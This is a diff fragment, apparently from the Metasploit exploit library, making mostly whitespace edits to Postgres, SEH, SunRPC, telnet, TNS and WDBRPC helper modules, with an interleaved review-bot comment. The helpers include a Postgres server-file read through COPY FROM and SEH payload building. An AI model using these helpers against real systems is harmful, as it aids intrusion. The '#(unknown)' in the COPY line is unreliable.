Rex::Text.rand_text_english(rand(6)+2) 
@@ -246,7 +246,7 @@ module Exploit::Remote::Postgres end temp_table_name = Rex::Text.rand_text_alpha(rand(10)+6) - read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT); + read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT); COPY #{temp_table_name} FROM '#(unknown)'; SELECT * FROM #{temp_table_name}} read_return = postgres_query(read_query,true) diff --git a/lib/msf/core/exploit/seh.rb b/lib/msf/core/exploit/seh.rb index 8343e59cda..7fb90b4008 100644 --- a/lib/msf/core/exploit/seh.rb +++ b/lib/msf/core/exploit/seh.rb @@ -3,7 +3,7 @@ require 'rex/exploitation/seh' module Msf ### -# +# # This mixin provides an interface to generating SEH registration records in a # robust fashion using the Rex::Exploitation::Seh class. # @@ -38,7 +38,7 @@ module Exploit::Seh # random padding. This should be derived from the maximum amount of # space available to the exploit for payloads minus the current payload # size. - # + # def generate_seh_record(handler, opts = {}) seh = Rex::Exploitation::Seh.new( payload_badchars, @@ -48,12 +48,12 @@ module Exploit::Seh # Generate the record seh.generate_seh_record(handler, datastore['DynamicSehRecord']) end - + def generate_seh_payload(handler, opts = {}) - + # The boilerplate this replaces always has 8 bytes for seh + addr seh_space = 8 + payload.nop_sled_size - + seh = Rex::Exploitation::Seh.new( payload_badchars, seh_space, @@ -61,7 +61,7 @@ module Exploit::Seh # Generate the record rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord']) - + # Append the payload, minus the nop sled that we replaced rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length) end diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index 5fd6352138..2ab3d1c103 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb 
@@ -150,7 +150,7 @@ module Exploit::Remote::SunRPC def progresolv(number) names = File.join(Msf::Config.install_root, "data", "wordlists", "rpc_names.txt") - File.open(names,"r").each_line do |line| + File.open(names, "rb").each_line do |line| next if line.empty? || line =~ /^\s*#/ if line =~ /^(\S+?)\s+(\d+)/ && number == $2.to_i diff --git a/lib/msf/core/exploit/telnet.rb b/lib/msf/core/exploit/telnet.rb index 4856537262..db93d81608 100644 --- a/lib/msf/core/exploit/telnet.rb +++ b/lib/msf/core/exploit/telnet.rb 
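Review bot: `File.open(names, "rb").each_line do |line|` never closes the handle it opens, so the descriptor lingers until garbage collection on every lookup, and if the loop body returns early on a match (as a lookup typically would) there is no later point where it could be closed. Wrapping the iteration in the block form, `File.open(names, "rb") { |f| f.each_line do |line| ... end }`, releases it on every exit path including the early return. The `$2` capture would also read better as `Regexp.last_match(2)` or a named capture. The rest of progresolv lies outside the hunk.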
@@ -13,74 +13,74 @@ module Exploit::Remote::Telnet
 include Exploit::Remote::Tcp
 # Borrowing constants from Ruby's Net::Telnet class (ruby license)
- IAC = 255.chr # "\377" # "\xff" # interpret as command
- DONT = 254.chr # "\376" # "\xfe" # you are not to use option
- DO = 253.chr # "\375" # "\xfd" # please, you use option
- WONT = 252.chr # "\374" # "\xfc" # I won't use option
- WILL = 251.chr # "\373" # "\xfb" # I will use option
- SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation
- GA = 249.chr # "\371" # "\xf9" # you may reverse the line
- EL = 248.chr # "\370" # "\xf8" # erase the current line
- EC = 247.chr # "\367" # "\xf7" # erase the current character
- AYT = 246.chr # "\366" # "\xf6" # are you there
- AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish
- IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently
- BREAK = 243.chr # "\363" # "\xf3" # break
- DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning
- NOP = 241.chr # "\361" # "\xf1" # nop
- SE = 240.chr # "\360" # "\xf0" # end sub negotiation
- EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode)
- ABORT = 238.chr # "\356" # "\xee" # Abort process
- SUSP = 237.chr # "\355" # "\xed" # Suspend process
- EOF = 236.chr # "\354" # "\xec" # End of file
- SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls
+ IAC = 255.chr # "\377" # "\xff" # interpret as command
+ DONT = 254.chr # "\376" # "\xfe" # you are not to use option
+ DO = 253.chr # "\375" # "\xfd" # please, you use option
+ WONT = 252.chr # "\374" # "\xfc" # I won't use option
+ WILL = 251.chr # "\373" # "\xfb" # I will use option
+ SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation
+ GA = 249.chr # "\371" # "\xf9" # you may reverse the line
+ EL = 248.chr # "\370" # "\xf8" # erase the current line
+ EC = 247.chr # "\367" # "\xf7" # erase the current character
+ AYT = 246.chr # "\366" # "\xf6" # are you there
+ AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish
+ IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently
+ BREAK = 243.chr # "\363" # "\xf3" # break
+ DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning
+ NOP = 241.chr # "\361" # "\xf1" # nop
+ SE = 240.chr # "\360" # "\xf0" # end sub negotiation
+ EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode)
+ ABORT = 238.chr # "\356" # "\xee" # Abort process
+ SUSP = 237.chr # "\355" # "\xed" # Suspend process
+ EOF = 236.chr # "\354" # "\xec" # End of file
+ SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls
- OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission
- OPT_ECHO = 1.chr # "\001" # "\x01" # Echo
- OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection
- OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead
- OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation
- OPT_STATUS = 5.chr # "\005" # "\x05" # Status
- OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark
- OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo
- OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width
- OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size
- OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition
- OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops
- OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition
- OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition
- OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops
- OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition
- OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition
- OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII
- OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout
- OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro
- OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal
- OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP
- OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output
- OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location
- OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type
- OPT_EOR = 25.chr # "\031" # "\x19" # End of Record
- OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification
- OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking
- OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number
- OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime
- OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD
- OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size
- OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed
- OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control
- OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode
- OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location
- OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option
- OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option
- OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option
- OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option
- OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List
+ OPT_BINARY = 0.chr # "\000" # "\x00" # Binary Transmission
+ OPT_ECHO = 1.chr # "\001" # "\x01" # Echo
+ OPT_RCP = 2.chr # "\002" # "\x02" # Reconnection
+ OPT_SGA = 3.chr # "\003" # "\x03" # Suppress Go Ahead
+ OPT_NAMS = 4.chr # "\004" # "\x04" # Approx Message Size Negotiation
+ OPT_STATUS = 5.chr # "\005" # "\x05" # Status
+ OPT_TM = 6.chr # "\006" # "\x06" # Timing Mark
+ OPT_RCTE = 7.chr # "\a" # "\x07" # Remote Controlled Trans and Echo
+ OPT_NAOL = 8.chr # "\010" # "\x08" # Output Line Width
+ OPT_NAOP = 9.chr # "\t" # "\x09" # Output Page Size
+ OPT_NAOCRD = 10.chr # "\n" # "\x0a" # Output Carriage-Return Disposition
+ OPT_NAOHTS = 11.chr # "\v" # "\x0b" # Output Horizontal Tab Stops
+ OPT_NAOHTD = 12.chr # "\f" # "\x0c" # Output Horizontal Tab Disposition
+ OPT_NAOFFD = 13.chr # "\r" # "\x0d" # Output Formfeed Disposition
+ OPT_NAOVTS = 14.chr # "\016" # "\x0e" # Output Vertical Tabstops
+ OPT_NAOVTD = 15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition
+ OPT_NAOLFD = 16.chr # "\020" # "\x10" # Output Linefeed Disposition
+ OPT_XASCII = 17.chr # "\021" # "\x11" # Extended ASCII
+ OPT_LOGOUT = 18.chr # "\022" # "\x12" # Logout
+ OPT_BM = 19.chr # "\023" # "\x13" # Byte Macro
+ OPT_DET = 20.chr # "\024" # "\x14" # Data Entry Terminal
+ OPT_SUPDUP = 21.chr # "\025" # "\x15" # SUPDUP
+ OPT_SUPDUPOUTPUT = 22.chr # "\026" # "\x16" # SUPDUP Output
+ OPT_SNDLOC = 23.chr # "\027" # "\x17" # Send Location
+ OPT_TTYPE = 24.chr # "\030" # "\x18" # Terminal Type
+ OPT_EOR = 25.chr # "\031" # "\x19" # End of Record
+ OPT_TUID = 26.chr # "\032" # "\x1a" # TACACS User Identification
+ OPT_OUTMRK = 27.chr # "\e" # "\x1b" # Output Marking
+ OPT_TTYLOC = 28.chr # "\034" # "\x1c" # Terminal Location Number
+ OPT_3270REGIME = 29.chr # "\035" # "\x1d" # Telnet 3270 Regime
+ OPT_X3PAD = 30.chr # "\036" # "\x1e" # X.3 PAD
+ OPT_NAWS = 31.chr # "\037" # "\x1f" # Negotiate About Window Size
+ OPT_TSPEED = 32.chr # " " # "\x20" # Terminal Speed
+ OPT_LFLOW = 33.chr # "!" # "\x21" # Remote Flow Control
+ OPT_LINEMODE = 34.chr # "\"" # "\x22" # Linemode
+ OPT_XDISPLOC = 35.chr # "#" # "\x23" # X Display Location
+ OPT_OLD_ENVIRON = 36.chr # "$" # "\x24" # Environment Option
+ OPT_AUTHENTICATION = 37.chr # "%" # "\x25" # Authentication Option
+ OPT_ENCRYPT = 38.chr # "&" # "\x26" # Encryption Option
+ OPT_NEW_ENVIRON = 39.chr # "'" # "\x27" # New Environment Option
+ OPT_EXOPL = 255.chr # "\377" # "\xff" # Extended-Options-List
- NULL = "\000"
- CR = "\015"
- LF = "\012"
- EOL = CR + LF
+ NULL = "\000"
+ CR = "\015"
+ LF = "\012"
+ EOL = CR + LF
 #
@@ -213,12 +213,10 @@ module Exploit::Remote::Telnet
 data.gsub!(/#{EOL}/no, "\n")
 data.gsub!(/#{IAC}(
- [#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|
- [#{DO}#{DONT}#{WILL}#{WONT}]
- [#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|
- #{SB}[^#{IAC}]*#{IAC}#{SE}
- )/xno) do
- m = $1
+ [#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|[#{DO}#{DONT}#{WILL}#{WONT}]
+ [#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|#{SB}[^#{IAC}]*#{IAC}#{SE}
+ )/xno) do
+ m = $1
 if m == IAC
 IAC
@@ -249,12 +247,12 @@ module Exploit::Remote::Telnet
 ''
 elsif m[0,1] == WONT
 fd.write(IAC + DONT + m[1,1])
- ''
+ ''
 else
 ''
 end
- end
- @trace << data
+ end
+ @trace << data
 @recvd << data
 fd.flush
diff --git a/lib/msf/core/exploit/tns.rb b/lib/msf/core/exploit/tns.rb
index a502fd4dd0..12a38b043f 100644
--- a/lib/msf/core/exploit/tns.rb
+++ b/lib/msf/core/exploit/tns.rb
@@ -82,7 +82,7 @@ module Exploit::Remote::TNS
 # Version
 pkt << "\x01\x39"
 # Version (Compatible)
- pkt << "\x01\x2C"
+ pkt << "\x01\x2C"
 pkt << "\x00\x81\x08\x00"
 pkt << "\x7F\xFF"
 pkt << "\x7F\x08"
diff --git a/lib/msf/core/exploit/wdbrpc.rb b/lib/msf/core/exploit/wdbrpc.rb
index 3b6b18dbf1..ce4e0dfc6a 100644
--- a/lib/msf/core/exploit/wdbrpc.rb
+++ b/lib/msf/core/exploit/wdbrpc.rb
@@ -50,9 +50,9 @@ module Exploit::Remote::WDBRPC
 # WDB_MEM_REGION
 data << [
- offset, # baseAddress
- length, # numberOfBytes
- params, # params
+ offset, # baseAddress
+ length, # numberOfBytes
+ params, # params
 ].pack("N*")
 wdbrpc_request(40, data)
@@ -63,9 +63,9 @@ module Exploit::Remote::WDBRPC
 # WDB_MEM_REGION
 data = [
- offset, # baseAddress
- length, # numberOfBytes
- params, # params
+ offset, # baseAddress
+ length, # numberOfBytes
+ params, # params
 ].pack("N*")
 wdbrpc_request(10, data)
@@ -75,7 +75,7 @@ module Exploit::Remote::WDBRPC
 # Make sure its DWORD aligned
 while(buff.length % 4 != 0)
- buff << "\x00"
+ buff << "\x00"
 end
 # WDB_MEM_XFER
@@ -92,14 +92,14 @@ module Exploit::Remote::WDBRPC
 def wdbrpc_request_memscan(offset=0, depth=1024, buff='', params=0)
 # Make sure its DWORD aligned
 while(buff.length % 4 != 0)
- buff << "\x00"
+ buff << "\x00"
 end
 # WDB_MEM_REGION
 data = [
- offset, # baseAddress
- depth, # numberOfBytes
- params, # params
+ offset, # baseAddress
+ depth, # numberOfBytes
+ params, # params
 ].pack("N*")
 # WDB_MEM_XFER